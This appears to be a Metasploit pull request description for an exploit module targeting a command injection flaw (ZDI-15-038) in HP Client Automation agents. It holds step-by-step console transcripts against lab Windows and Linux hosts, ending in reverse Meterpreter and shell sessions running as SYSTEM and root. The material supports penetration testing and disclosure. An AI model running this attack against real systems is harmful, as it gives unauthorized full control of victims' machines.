Add module for ZDI-15-038, Persistent (HP) Client Automation Command Injection RCE

[jvazquez-r7]

Tested on:

• Win 7 SP1 (32 bits) with HPCA agent 9.00 for Windows
• Centos 5 (64 bits) with HPCA agent 9.00 for Linux

Verification

• Download HPCA 9.00 Enterprise trial from http://www8.hp.com/us/en/software-solutions/client-automation-management-software/
• Review the installation documentation available on the Doc folder of the trial ISO (I cannot explain the installation steps better than the official really)
• First of all Install an HPCA Core Server on a Windows 2003 SP2 server (maybe you can just install the agents, I've not tried to install them without a Core server)

Exploit Windows target

• Install an HPCA Windows Agent on a Windows 7 SP1 machine
• Start the console and use the module on this pull request

msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) >

• Set the target and options

msf exploit(persistent_hpca_radexec_exec) > set TARGET 1
TARGET => 1
msf exploit(persistent_hpca_radexec_exec) > set RHOST 172.16.158.132
RHOST => 172.16.158.132

• Check, verify it finds the service

msf exploit(persistent_hpca_radexec_exec) > check
[*] 172.16.158.132:3465 - The target service is running, but could not be validated.

• Set the payload, Exploit,verify which you get a session

msf exploit(persistent_hpca_radexec_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Exploiting Windows target...
[*] Command Stager progress -   0.26% done (289/109237 bytes)
[*] Command Stager progress -   0.53% done (578/109237 bytes)
[*] Command Stager progress -   0.79% done (867/109237 bytes)
[*] Command Stager progress -   1.06% done (1156/109237 bytes)
[*] Command Stager progress -   1.32% done (1445/109237 bytes)
[*] Command Stager progress -   1.59% done (1734/109237 bytes)
[*] Command Stager progress -   1.85% done (2023/109237 bytes)

[*] Command Stager progress -  99.68% done (108882/109237 bytes)
[*] Command Stager progress -  99.93% done (109158/109237 bytes)
[*] Command Stager progress - 100.00% done (109237/109237 bytes)
[*] Sending stage (770048 bytes) to 172.16.158.132
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.132:49166) at 2015-02-20 01:01:46 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

Exploit linux target

• Install an HPCA Linux Agent on a CentOS 5 (64 bits) machine
• Start the console and use the module on this pull request

msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) >

• Set the target and options

msf exploit(persistent_hpca_radexec_exec) > set target 0
target => 0
msf exploit(persistent_hpca_radexec_exec) > set rhost 172.16.158.133
rhost => 172.16.158.133

• Check, verify it finds the service

msf exploit(persistent_hpca_radexec_exec) > check
[*] 172.16.158.133:3465 - The target service is running, but could not be validated.

• Set the payload, Exploit,verify which you get a session

msf exploit(persistent_hpca_radexec_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(persistent_hpca_radexec_exec) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(persistent_hpca_radexec_exec) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[*] Exploiting Linux target...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 8UJxoZHHsO08NDtE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "8UJxoZHHsO08NDtE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 3 opened (172.16.158.1:4444 -> 172.16.158.133:41659) at 2015-02-20 01:06:25 -0600

id
uid=0(root) gid=0(root)
^C
Abort session 3? [y/N]  y

[*] 172.16.158.133 - Command shell session 3 closed.  Reason: User exit